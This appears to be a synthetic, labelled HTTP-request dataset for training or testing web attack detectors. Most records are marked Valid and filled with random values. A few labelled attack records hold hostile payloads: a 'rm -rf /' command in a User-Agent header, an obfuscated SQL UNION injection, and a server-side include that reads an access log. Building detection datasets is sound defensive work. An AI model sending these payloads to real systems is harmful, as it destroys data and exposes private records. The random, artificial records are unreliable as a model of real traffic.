Via: itgu/7.9 143.136.103.236, oEdi/3.0 215.9.188.177
Transfer-Encoding: gzip
Upgrade: rotyo/7.0, 8her6/3.5, erjkwi/8.1, 4env6/4.2, oh0n/5.8
Warning: 742 www.inttce.js "oAn7ShenPaoetctTnl" "Sat, 02 Dec 06 12:45:12 CET"
X-Forwarded-For: 185.54.94.71
X-Serial-Number: 958943826904140
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15013
Start - Id: 30095
class: Valid
GET /iclmz8/lcthteihlirtlkxc3eho/4q/aD/er4leefp4xoc8oane.jpg? HTTP/1.0
Host: www.tpie.st
Connection: close
Accept: video/quicktime;q=0.0, text/*, image/gif;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: pqdvid-gl3hDs;q=0.7
Cache-Control: only-if-cached
Client-ip: 117.251.79.81
Cookie: w7SB1=906;mtyaiednn7Tpe=~ ]rchj?sn1hd;ieofepbkor3oe=rwetefTc2
Cookie2: $Version="5"
Date: Tue, 10 Feb 04 21:58:07 GMT
ETag: W/"Ocoimis9INXKn05DKM"
Expect: 8uny=hsewwha;ekbowigr
From: mhodu2@U9yLcoem.st
If-Modified-Since: Mon, 17 Mar 08 20:13:41 CET
If-Unmodified-Since: Mon, 04 May 09 08:47:27 UTC
If-Match: "F_kSxzy9ZrENh4T7WdbO"
If-None-Match: *
If-Range: Sat, 26 Jan 08 08:13:08 UTC
Max-Forwards: 695
MIME-Version: 3.3
Pragma: otn91ua='Dn'
Proxy-Authorization: NTLM dDNhY2RiZWVrZGVvdHlnYW50YWlJMzNpcjFpNnBvZHl4RHJydGJvdGxtNA==
Authorization: eusrb oaUM=teyle
Range: 64757-,-88
Referer: http://seAot.com/dotw0/mn9g.tiff
TE: chunked,trailers
Trailer: Date
User-Agent: ovKV94AgmT http://www.jiia.cz
UA-CPU: MIPS
UA-Disp: 978,2584,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 118x9358
Via: 8.5 www.5cuimNaz.gif:58, FTP/1.8 100.181.210.255, 8.3 126.143.35.28
Transfer-Encoding: compress
Upgrade: AajeA/4.4
Warning: 166 93.46.119.175 "apeeou6Udinzauet" "Thu, 11 Dec 08 02:46:24 UTC"
X-Forwarded-For: 129.252.117.122
X-Serial-Number: 131299472861769232
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30095
Start - Id: 12203
class: Valid
GET /tIdIM.BYfQhno/xp_ti_0Qd3dG@.0/au3ntr8eDheier/aaecdz/neJCZktelnetOMfwinntYNH6/2oeeeAueidrNel9hoe/dsYia0yistlbm/goholl/lJtMd2KZu1RjloOry1OV/snearoslbblidb/nAg/sMUgIQhK.ulF.css?afW4=untxml&mrsott8t=8172&tamzehrhce=cjwI&6c=c%29ewbgsoundaif&uteaj=rCkf.N%40.pCOr&hsntOksrmw=iaopenoWeTS6Uwherer&mlsn5XoykHv=I9&6rooHdkuart7o=a&cholcznohtNhuk=ndot%7C HTTP/1.1
Host: www.s5lalo.st
Connection: tdreiav
Accept: */*;q=0.2
Accept-Charset: iso-8859-8-i, iso-8859-8-i;q=0.7, macintosh, iso-8859-6, iso-8859-6
Accept-Encoding: 
Accept-Language: *
Cache-Control: eer=wxi0msgZ
Client-ip: 248.19.13.110
Cookie: XnPG=oodfa2s;lemss9zoervidi=g0CrheI5cfay;ehee=21183772;r1gqtpdtn=fm.iRI8s.;mOPNsiiFkgroup byJt=ed5fzJbjo5lZ
Cookie2: $Version="20"
Date: Sat, 19 Nov 05 19:22:12 CET
ETag: W/"B5G66.dZxj1jVUQeN_KK"
Expect: tEtAetoh=4kiEndcs;drhbda3
From: 0asmsn6h@SRnxete.org
If-Modified-Since: Sun, 25 Jan 04 16:57:05 UTC
If-Unmodified-Since: Thu, 13 Nov 08 24:13:42 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 087
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: whuq neane=nte9e
Authorization: esgl wntes=g9hn
Range: -341,81708-966475
Referer: /tLrst/tu5Hi/mITmtc/lsne5.css
TE: deflate;q=0.8,deflate;q=0.2,trailers
Trailer: Expect
User-Agent: Mozilla/2.9 (Windows; U; Win98 9.1; cs-ef; rv:5.2.3) Gecko/96488999
UA-CPU: x86
UA-Disp: 3158,9578,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 161x2699
Via: 1.4 240.231.163.172:181, HTTP/7.7 194.68.188.44, 6.2 www.kiedre.css
Transfer-Encoding: gzip
Upgrade: 8cClsn/2.6, omSiT3/7.4, f6it2/4.1
Warning: 093 www.niwbedo.shtml "3eaiaiRarlwbw8hiaee" "Tue, 10 Jan 06 12:35:20 UTC"
X-Forwarded-For: 75.67.125.249
X-Serial-Number: 1017195793221995647
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12203
Start - Id: 33815
class: Valid
POST /sI0@CQq@Ie/oCEOcVU4S7cf.shtml? HTTP/1.0
Content-Length: 215
Content-Language: eNj7
Content-Encoding: deflate
Content-Location: http://xwqemo.fr/tpaeede1/wrlsvl/siK5hta/Ermenarn/erni.mdb
Content-MD5: SHRvZWUzd2hTb2NzZUh0NA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Feb 08 17:31:53 UTC
Last-Modified: Sun, 21 May 06 10:43:52 GMT
Host: www.Ebmniura.net
Connection: keep-alive
Accept: application/*, video/mpeg, audio/basic
Accept-Charset: iso-8859-3
Accept-Encoding: identity;q=0.7, gzip;q=0.4, gzip;q=0.4, compress
Accept-Language: 8eimsI-nghyc0f;q=0.0, sp-Oes, oEtisnb-a
Cache-Control: max-age=5
Client-ip: 213.87.187.9
Cookie: don=aVb-KUIHZyxs;olznhs=3872;hOnriooue0ati=4wF;to1=naifrom$d[yoE2uthree)4r;an4tmoaootwe=ne
Cookie2: $Version="7"
Date: Wed, 29 Sep 04 02:47:48 CET
ETag: W/"UQn-F54kvH9b7bV0norE"
Expect: wahoRt
From: dmRxngT@spiuhlni.ch
If-Modified-Since: Sun, 15 Feb 04 21:23:11 UTC
If-Unmodified-Since: Wed, 04 Feb 09 22:07:28 GMT
If-Match: "mPTPQHXO0ZeR4lBBo"
If-None-Match: "s7PiIuKh2pFCmQQtxC"
If-Range: *
Max-Forwards: 433
MIME-Version: 3.7
Pragma: kdshnye='bnmEft'
Proxy-Authorization: Basic cXJ0ZWRyOnFUeWN0YQ==
Authorization: mbxrrt retase4s=mzmer
Range: 54-,81-
Referer: http://www.HistjSh.biz/alcei/ooTpmhah.rar
TE: deflate
Trailer: Trailer
User-Agent: Mozilla/7.6 (compatible; MSIE 6.5; SunOS sun4u; EC9r)
UA-CPU: Sparc
UA-Disp: 465,2154,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 301x2853
Via: HTTP/6.4 89.20.154.156
Transfer-Encoding: kwullp
Upgrade: ncln/7.1
Warning: 439 www.eoera.jpg "bg9r8au3atu" "Fri, 15 Feb 08 09:18:04 UTC"
X-Forwarded-For: 54.10.214.243
X-Serial-Number: 9495993319607061113
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N.d9Av=516154&biframemochaPs1VxSKetcj=m7Vc|dfa6lfas2s&ukdiaioEmg5a=9721781&AreeurqfdNry=989&xomtmEoin=npwl5Eacmcuhfhbr&fU0lulyohiu=documentmaea|ne&ymehs=@cgroup byDsMdd&3optvaj0Xselect-H=290&osAsOqa=7092008564

End - Id: 33815
Start - Id: 43616
class: OsCommanding
POST /qbeEEaletwCchpoh/emtt7tyQ/rdr5/r5/tIsyereys/melmt2e4/thOFDkcrV11WRt/eMgj5h2qBra-S.mspx? HTTP/1.1
Content-Length: 82
Content-Language: n4nj1
Content-Encoding: gzip
Content-Location: /Elst/Hsgl/n0eni/jef4ti.swf
Content-MD5: aXJhc1NvYXlxcHN5aW5uaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Jun 06 07:23:57 GMT
Last-Modified: Sat, 02 May 09 10:45:18 CET
Host: 206.37.70.236
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 112.171.189.97
Cookie: lof7drrn=89656895
Cookie2: $Version="623"
Date: Tue, 31 Aug 04 24:46:27 GMT
ETag: W/"xa95_w0Wlj3Xi2ojD"
Expect: sii0tlh=i1nei1yi;qiyd3=hitetaby
From: ihse@2d96a.de
If-Modified-Since: Wed, 12 Jan 05 07:06:59 CET
If-Unmodified-Since: Wed, 17 Jun 09 19:57:34 CET
If-Match: "sGyF-_bKIPkXf1C"
If-None-Match: "hr4uYUZeP7ZbM_7"
If-Range: Mon, 28 Sep 09 08:29:47 UTC
Max-Forwards: 6
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM YW9pNTJZMWxvYTFhZWFpZWRtZUVzaHRob0VlOHJHbjR0ZjJNY29lZHRhYWFibA==
Authorization: NTLM bWw2aGRzY1NhbGx1cDNvaWNhbmp0b21ubnNzaXJJZW9hbQ==
Range: 559-01519,-1,07-
Referer: http://saEcts.be/ieocb.swf
TE: chunked;q=0.6
User-Agent: `rm -rf  /     `
UA-CPU: x86
UA-Disp: 2173,331,32
UA-Pixels: 6552x5468
Via: 2.8 www.wo8oeCds.jpeg, 2.7 www.pseigaal.jpg:8431
Transfer-Encoding: r2erw
Upgrade: ztui/9.8, e5en/4.5, osoee/7.9, inhqa/2.0, 7Mlsb/6.6
Warning: 269 172.144.95.146 "bhtiubetl5ini" 
X-Forwarded-For: 1.73.97.53
X-Serial-Number: 1018067
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

eaosA=765&2skRrr=snrhijDNnp3oh&gr=5n&eee=o=oist-Yw&OucTz=498&7iadyneoa=AlnAonahn

End - Id: 43616
Start - Id: 42256
class: SqlInjection
GET /s96/0pYYmfbpasswdJBp/6sCP2Ey3@PMLFX/dIQO3S2a_0atk/bk5FlB09KjS2wd/00Lwindow.openTSxTNs/ererioeptua/ouiErlecte3eoi/t2lu.mspx?v.4I=pgpaaa+6nnph-fenph-rlzasock_streamn&ix=3&nTdeoav=rt&wrqe=362&ciid9tlhrtic=%27++%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F632%2F**%2FFROM%2F**%2FfNhel2y5%2F**%2FWHERE%2F**%2F%28++%27%27++++%3D+++%27+++++%2F**%2F&eilg=C+&sndltiyoFznnH=eaviht&QF9ZSJy-VwC=-c%2B%3Dwinnt HTTP/1.1
Host: www.gbh7elmt.de
Connection: dmofeh
Accept: audio/x-wav;q=0.5, video/*, video/quicktime
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: uxl-xmee0e;q=0.5, utesgt1-thar8iu;q=0.7, e-sabtN;q=0.5, o-cihl;q=0.3, rdatnu-sIluboOg
Cache-Control: only-if-cached
Client-ip: 164.216.181.230
Cookie: eqd=lmK0s1-aczm9
Cookie2: $Version="528"
Date: Sun, 04 Feb 07 04:14:58 UTC
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: cuyents@tqutcrxrn.be
If-Modified-Since: Tue, 29 Apr 08 23:18:40 UTC
If-Unmodified-Since: Fri, 11 Feb 05 17:41:06 CET
If-Match: "crKChwbbBiVARyO"
If-None-Match: *
If-Range: Sun, 01 Nov 09 12:19:07 GMT
Max-Forwards: 2
MIME-Version: 7.5
Pragma: ds=si4
Proxy-Authorization: NTLM aWd1eTNuZHNvSTdmd3VkeFJzcHFodHV0dHlmRGVsNm8=
Authorization: NTLM ZGxyY2F3cml0dmFkeHhpZzN2YWlpb3hkM2JvcmR0aW5hcnU=
Range: 041331-40746,8485-207,-9
Referer: http://www.wnwhsdh.com/e5t4e/on5birv/jngotss/nlehhn/xcAiE.cgi
TE: trailers,gzip,trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.7 (Windows; U; Win98 2.6; bE-hs; rv:8.4.5) Gecko/14936237
UA-CPU: StrongARM
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 4325x083
Via: 1.6 66.3.83.70:41454
Transfer-Encoding: gzip
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 939 3.193.4.247 "eeviCoadbEttmsy" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42256
Start - Id: 30626
class: Valid
GET /iRC7ADGfBpq@XRENL.5K/aXHR3MVm9QzUy/rglsyosNiebrlTtot5dn/eRAE/taNypZ6Qv.jOUFyjKGU/ah5NZz@s/ciosnHOsjeetogoamrdg/tbetweenUbdadminqGftpsock_streamopenkftpchildL/hWj2e2fJpKEcTKdikFw/sPxQXyxTr@gi_RT/nHQIO_inputKALiAXX.dll?srjmeoreeYeaot=Ascu&RlzT=r6aee&ZjHxmtmp16r4oV=+o%7Cr&eannoh=do04BXB&wiiikmaah=1%25rqs%3Ce&p8z9=wCl5Otts&xa0rqdhcvcdrn=tu71-&bnrheguo=o3D&egnoxf5hf=o9n15V.R2&ruc=8364844058 HTTP/1.1
Host: www.d7tt7nfb.st
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 29.28.47.211
Cookie: tu-3LrXpasswdWFiR=(a;jzd4ot=lErOe7eap;aeze=31;e5Her=87438893
Cookie2: $Version="530"
Date: Thu, 06 Apr 06 05:48:09 UTC
ETag: W/"zq5kPQg.QD_a9pF5"
Expect: sheseepe
From: rAjai@bdsfim.st
If-Modified-Since: Wed, 24 Dec 08 07:53:06 CET
If-Unmodified-Since: Tue, 17 Feb 04 17:09:30 CET
If-Match: *
If-None-Match: *
If-Range: "RY5IYclk_5FejcNXJ"
Max-Forwards: 3
MIME-Version: 1.8
Pragma: nEN='rlmeis'
Proxy-Authorization: Basic dG9yZWNuaWk6ZUVEaWFySw==
Authorization: NTLM bmVlM29zb2ZoZWVuaElzc2FlbHRkZWVlYWh3Y290QXV0b3Q=
Range: 426-,-6
Referer: http://www.Hspia.net/pbtwe9o/tDskd/eenrt.jsp
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: r0eaIo (iN6R.BvqHr)
UA-CPU: StrongARM
UA-Disp: 436,0901,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 015x009
Via: 8.6 84.18.147.82
Transfer-Encoding: identity
Upgrade: 0gtw/9.1, Wtkt/5.8, Hes6g/7.6, RE4ntd/6.1
Warning: 055 www.eenm1.shtml "niJnlgnspnleuaov" 
X-Forwarded-For: 115.201.164.251
X-Serial-Number: 79914989141850023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 30626
Start - Id: 29135
class: Valid
GET /llalffFiayEc/8-PbU/eag1uaenjIgtt/sVW/eyz8BX2FqZ3b43/e-n-Lijhvk/rmeeNeZnrton/jt5Siluavni3n4ueg721/ee5Ewo4ne/tFVWFmSkj14IUW9/dZvidx72m1AMZw9q4lbJ/euQ5LRI9.htm?xioUomT=abHoQ&tlny=s8dhuecel HTTP/1.0
Host: 178.73.237.145
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.8, compress
Accept-Language: mrra-oo, e1-esfamaoe;q=0.5, ean-7cv, s-lea;q=0.4, ueyOri-ee3d
Cache-Control: max-age=2
Client-ip: 186.234.179.68
Cookie: eaeiTeMsety=rjss;asidhS= r:l;s_Fhlxr8u=ohz@a
Cookie2: $Version="429"
Date: Sun, 20 Dec 09 11:50:09 CET
ETag: W/"5tyi6i@@GVLMdq_M"
Expect: 100-continue
From: 9tlsAera@gi2n.org
If-Modified-Since: Thu, 13 Apr 06 04:15:59 UTC
If-Unmodified-Since: Fri, 01 Jan 10 23:46:52 UTC
If-Match: "iP.MyzAfU@@shxUw"
If-None-Match: "DSD5PfRz6Q2olVde"
If-Range: Fri, 13 Mar 09 16:00:28 GMT
Max-Forwards: 3473
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic ZWVhaHJBZjc6b2Vzbw==
Authorization: Digest uri=http://www.dnkSuN.uk/nt58rt/xrnaaid.doc
Range: -6
Referer: http://loteprb.com/idMn1e7s/hhshfzna/erAsatn.txt
TE: trailers
Trailer: User-Agent
User-Agent: wtwE (yR84_bsv)
UA-CPU: MIPS
UA-Disp: 112,924,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 466x304
Via: HTTP/2.8 167.173.188.174
Transfer-Encoding: compress
Upgrade: ec9/9.0, tdi/9.7, rri/1.9, iedD92/0.3, piyrsf/0.2
Warning: 235 www.aliaS.js "ienttr9bl" 
X-Forwarded-For: 15.219.134.176
X-Serial-Number: 1881707
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29135
Start - Id: 39644
class: SSI
GET /aUE0asn/CeaanNgnwtsppt/hCY3W/dMautoexecMzb5V1img-S/l55VplDRkaPndTBQ.htm?ashiS=8estrdRoQ&4lnoj=00603858&itrsoeesk4Exhh=57590632&Ksshutdownq=%3C%21--%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E&neetppucbhue=hfna%3Dlog%3Cexec&bO7o=1e&g9reolsaigEo=hlcexec2&MtMqp6p5r8Ce=rdy7Rs&atWhNrteuNc=e4etadhereoiAe0N&doa8ntP=EafhIdrh&hof9=tuyr0aioLbhAlsusr+ HTTP/1.0
Host: 216.72.254.43
Connection: a5ses1Eh
Accept: video/mpeg, audio/*
Accept-Charset: windows-874, hz-gb-2312;q=0.7
Accept-Encoding: deflate, deflate
Accept-Language: *;q=0.0
Cache-Control: min-fresh=4
Client-ip: 39.207.20.202
Cookie: lgshtvo0=dzsu;stnp6ld=88865580;etete=ndrcpbino0;TaIhe=90265082
Cookie2: $Version="3"
Date: Wed, 21 May 08 15:45:01 UTC
ETag: W/"A2.v71CkZHD7@G96Mx"
Expect: 100-continue
From: w3fee@ThEishEn.net
If-Modified-Since: Sat, 16 Dec 06 24:30:49 GMT
If-Unmodified-Since: Fri, 20 May 05 08:22:40 UTC
If-Match: "3MzhBm@i5u4udxZXE4m"
If-None-Match: "IW37ej9JezZMgRmh"
If-Range: *
Max-Forwards: 38
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: Digest response="7990c8aD25A18B6bFB7a1D1BBAdb1e1f"
Range: 54-,0-33,3-74
Referer: /pdit/hTwgAtt/iveu/nche/bliheaa.txt
TE: trailers,gzip;q=0.0
Trailer: Authorization
User-Agent: Mozilla/8.5 (X11; U; Unix 3.0; cb-wL; rv:9.8.7) Gecko/22970161
UA-CPU: PowerPC
UA-Disp: 749,540,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 587x0700
Via: 9.8 www.nxdsog.jpeg:792, 8.1 179.52.196.3, 6.8 21.9.135.254:153
Transfer-Encoding: compress
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 209.99.255.194
X-Serial-Number: 659531112
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39644
Start - Id: 26393
class: Valid
GET /uhyo/oBVfCGx3iRg/LzXb2@SaI/L@NncEzD@VM/vp.IbTxVM5KP@v4nS/T.JcH9JH0locationNrh.js? HTTP/1.0
Host: www.7tal.ch:80
Connection: keep-alive
Accept: audio/*, text/xml;q=0.0
Accept-Charset: x-mac-cyrillic
Accept-Encoding: 
Accept-Language: ri-nit, 1u8-heees3e;q=0.0, odi0-wNd, erauomhR-ed5;q=0.3, h0ceyrr-dgunns6
Cache-Control: oasT53r='n'
Client-ip: 250.76.61.234
Cookie: arsMacu=o;tlll3yp=54049361
Cookie2: $Version="9"
Date: Sun, 14 Dec 08 02:23:13 UTC
ETag: W/"lxOd-IIVqXV7vkQNfO"
Expect: gsroej
From: aR5eoW@aIpYiyate.org
If-Modified-Since: Sat, 07 Nov 09 23:46:30 UTC
If-Unmodified-Since: Wed, 24 Mar 10 23:04:57 CET
If-Match: *
If-None-Match: "zsWRlUZKHVYSewXMSNA"
If-Range: Mon, 21 Apr 08 22:00:11 GMT
Max-Forwards: 43
MIME-Version: 1.1
Pragma: eQdn='h'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: s56l t6v4IM0e=aspno
Range: -954249,93-21781,60217-
Referer: http://www.lsqdtgu.org/ai5lar/oa6aa/3ebztt/pyrytd.sh
TE: trailers,deflate;q=0.6
Trailer: Pragma
User-Agent: Mozilla/6.8 (X11; U; Solaris 8.3; ee-0E; rv:5.1.1) Gecko/63930070
UA-CPU: StrongARM
UA-Disp: 146,5965,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5346x326
Via: te3na/6.1 www.rcdtr.jpeg
Transfer-Encoding: compress
Upgrade: Yoanr/1.5, vNn/4.7, 7loa/0.1, nab9I/9.9, ale/2.7
Warning: 601 www.tutmoai.png:0 "Mibaotwwhlhhl" 
X-Forwarded-For: 21.229.165.135
X-Serial-Number: 7631325909856
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26393
Start - Id: 8586
class: Valid
GET /mqSKJt/hoFdsSdkaea3pu8cujc/9nrIcxmsrelbee52/s-pko9sbRmZ6qLZNNE/rGbppHYS/we/gppal9.js?F@4a=%26&g7=aedyrpnim1meta&yuolmrroeoefh=4DRTrcNQxFUL&Nptrl93lineaiu=lies&n7Ile4snu=c%5Dc&stcthtdn=h6%25ielorpfromaeboot.iniech HTTP/1.0
Host: www.elcejtgea.gov:1
Connection: keep-alive
Accept: audio/*;q=0.5, application/postscript
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.0
Accept-Language: sgev-B6v52e, roa9hsd-n
Cache-Control: no-transform
Client-ip: 86.108.245.73
Cookie: wtcnana= bee;53s=tBehJ7Sx;nziqa8ris=chrn;s8rAqat4sceeeCe=uott2nygohonktbt
Cookie2: $Version="9"
Date: Wed, 18 Nov 09 18:36:20 CET
ETag: "DGgt8SPDzWPxBrfgbo"
Expect: 100-continue
From: ebpee@y0et.gov
If-Modified-Since: Mon, 05 Dec 05 07:08:13 CET
If-Unmodified-Since: Sat, 05 Feb 05 13:43:10 CET
If-Match: "pSI9.JEa6v1XRZVy"
If-None-Match: *
If-Range: Tue, 25 Jul 06 09:27:02 CET
Max-Forwards: 6958
MIME-Version: 8.0
Pragma: mtrLeyhg=iheoa
Proxy-Authorization: NTLM RWUxYWVxcnJzaWt3ZWxzZHVpZW1kZXJzaW00bWZyenNpcmxpbWVpOWY2Ug==
Authorization: NTLM aXJhcmV5ZXRzbG50MGloenJpOXRpbGU0eXRyYXVhUnJ4MHQx
Range: -281,776-17139
Referer: /0onbai.mdb
TE: deflate,deflate;q=0.5,gzip;q=0.8
Trailer: Range
User-Agent: TneTeegtssoNwa
UA-CPU: Sparc
UA-Disp: 692,9024,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 783x6311
Via: FTP/5.6 185.250.45.223, ixtn/8.0 5.0.129.170
Transfer-Encoding: compress
Upgrade: PxnR/1.4, fotka/2.5
Warning: 294 www.tpriIw.html "evdBEd" 
X-Forwarded-For: 130.166.17.51
X-Serial-Number: 1101244
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8586
Start - Id: 19282
class: Valid
GET /rentgoaeulfnoqs8mbtm/aoR.K_2bVcincludelibJ/cpLOv@o242k6AXXRGau/ne3reteosltlIo6hts/4sJQ3F7i4vqq51S/uiejmud/EotelnetalbetcjS/hO/asga01omshdeegraAl8.asmx? HTTP/1.0
Host: www.Algu7me36d.uk
Connection: rlamtm2o
Accept: image/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 52.24.224.97
Cookie: oymoqyoinnggH3R=fsueno7ed1cemu;uRteTrtvedouuen=llJFl3dT
Cookie2: $Version="81"
Date: Fri, 09 Sep 05 15:36:17 UTC
ETag: ".ZlLtGuaV5@fC5qxt72"
Expect: 100-continue
From: Aehridef@o4bErsthw.cz
If-Modified-Since: Tue, 25 Mar 08 19:47:45 GMT
If-Unmodified-Since: Thu, 24 Jan 08 19:55:05 GMT
If-Match: ".u7-n87Op8K8.zeMJv"
If-None-Match: "-CHWlYtXWwatY-@68"
If-Range: "dBIzu4NKdq.7-UlK6"
Max-Forwards: 925
MIME-Version: 6.3
Pragma: yeogtt='dmelnulp'
Proxy-Authorization: Basic OGVlYm9zOnJpYm5z
Authorization: NTLM bHRzZmRpUGllY2FuaGE2UHRpYXQyemtpWWw2RWNuamVlaG9hZXBpc2duaXVkYg==
Range: 784688-250,21331-
Referer: http://www.ysITs0r.org/tecrb4/1spL/pnci9nle/rma4/nerdf0eE.doc
TE: deflate,trailers,chunked
Trailer: Expect
User-Agent: hiqfaa http://www.da3ovrz.fr
UA-CPU: 68000
UA-Disp: 4381,601,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8924x1608
Via: 4.5 www.eyevdCez.html:67
Transfer-Encoding: identity
Upgrade: e1En/4.6, xtnec/2.1, tlslos/3.4
Warning: 029 www.Bnho.gif "udTe0toroga" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 393086247470892838
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19282
Start - Id: 19400
class: Valid
GET /n7XEZ/dpTZ5vRG/1HvGIUbodys/mm-Yxe.@0wP9M2dS/JXFwp-gBbzxggc5/td.shtml?riw64lxddlee=mtahr&uc=sIHnetowiofoNS5&seeiitilkeAPosc=oamEa5&oi=495772854&0osbe=correplaceiivrdyshQt%27&Slikee5Rae=yD7NeTj%40&aeeoidzedret1=13901 HTTP/1.0
Host: 227.212.49.43
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.2, identity;q=0.7, identity;q=0.6
Accept-Language: *;q=0.1
Cache-Control: eoac=8eta1t
Client-ip: 159.172.225.167
Cookie: 3ci=aeceIstyleNp iulsa;dwYuswardtgwr=ceodd5wrlnai;zafrntdtoe2hal=etd/m;u4o04=01;orUThkS8=upnatcnst9sSrl
Cookie2: $Version="3"
Date: Sat, 24 May 08 13:17:49 GMT
ETag: "qdS-CbZjhJjqpjwv1kiK"
Expect: Aayeaeu
From: unsxob@wuKtvh6Lni.com
If-Modified-Since: Sat, 03 Oct 09 19:55:53 GMT
If-Unmodified-Since: Wed, 14 Feb 07 15:08:43 UTC
If-Match: "pklPWloJ4wk15FHV"
If-None-Match: *
If-Range: Mon, 30 Aug 04 17:28:22 GMT
Max-Forwards: 28
MIME-Version: 4.9
Pragma: fi=jhzphe
Proxy-Authorization: NTLM aW9jckVuZWh1OXRia2xPZWF0bm13cXRSM29nZXBBcnJaYXl3bFRuaGFhc2RwQW9h
Authorization: Basic bWRvczhlYXM6ZWVodA==
Range: 512940-12029,467-92321
Referer: http://www.onasnhrh.biz/esfpotr/s4yzerg.pdf
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/0.0 (Machintosh; U; PPC 4.5; t3-gl; rv:3.1.7) Gecko/60791161
UA-CPU: x86
UA-Disp: 818,3466,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6070x723
Via: HTTP/4.5 95.41.27.172
Transfer-Encoding: lotsnn; Nl2ewx=pQnEel
Upgrade: 0hnhm/0.0
Warning: 515 6.189.134.75 "7iimeytvetemune1t9e" 
X-Forwarded-For: 72.140.87.177
X-Serial-Number: 5993658067550
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19400
Start - Id: 5670
class: Valid
POST /Alikejstylei/Wa/z6Q.msf? HTTP/1.0
Content-Length: 132
Content-Language: e5,oIhr
Content-Encoding: deflate
Content-Location: /xrlpbpr5/e6oeraHE.exe
Content-MD5: YTAycmVlZWRhZHNlcnRycw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Mar 05 07:08:29 GMT
Last-Modified: Mon, 22 Dec 08 01:58:56 UTC
Host: 66.222.67.198
Connection: rptsu
Accept: video/*;q=0.0
Accept-Charset: cp-936;q=0.9
Accept-Encoding: 
Accept-Language: tderekev-rt;q=0.7, c5nnrtda-9ifpOi;q=0.8
Cache-Control: only-if-cached
Client-ip: 214.147.205.41
Cookie: gotw9itqeofi2r=hwm7h_tw4XR;naw02ixo39bi83=0140320;mk2m=<execRLt40eaTg;eAe=ic8;rAtNgoers2=tcfyotaosxcht4;Tmitntodaod4=ra6s4ceungcw
Cookie2: $Version="36"
Date: Tue, 07 Sep 04 18:44:52 GMT
ETag: "W-Woimzu-1OZAg8"
Expect: 100-continue
From: mmoxwRia@ho0Etrh7.de
If-Modified-Since: Sat, 27 Aug 05 01:03:16 GMT
If-Unmodified-Since: Sun, 24 Jan 10 11:41:54 CET
If-Match: *
If-None-Match: "LU-vwryzBk7xlxgg"
If-Range: *
Max-Forwards: 947
MIME-Version: 7.2
Pragma: nEnceep=9sbdmee0
Proxy-Authorization: 5emer ephane=n6oq
Authorization: Digest algorithm=eper0s
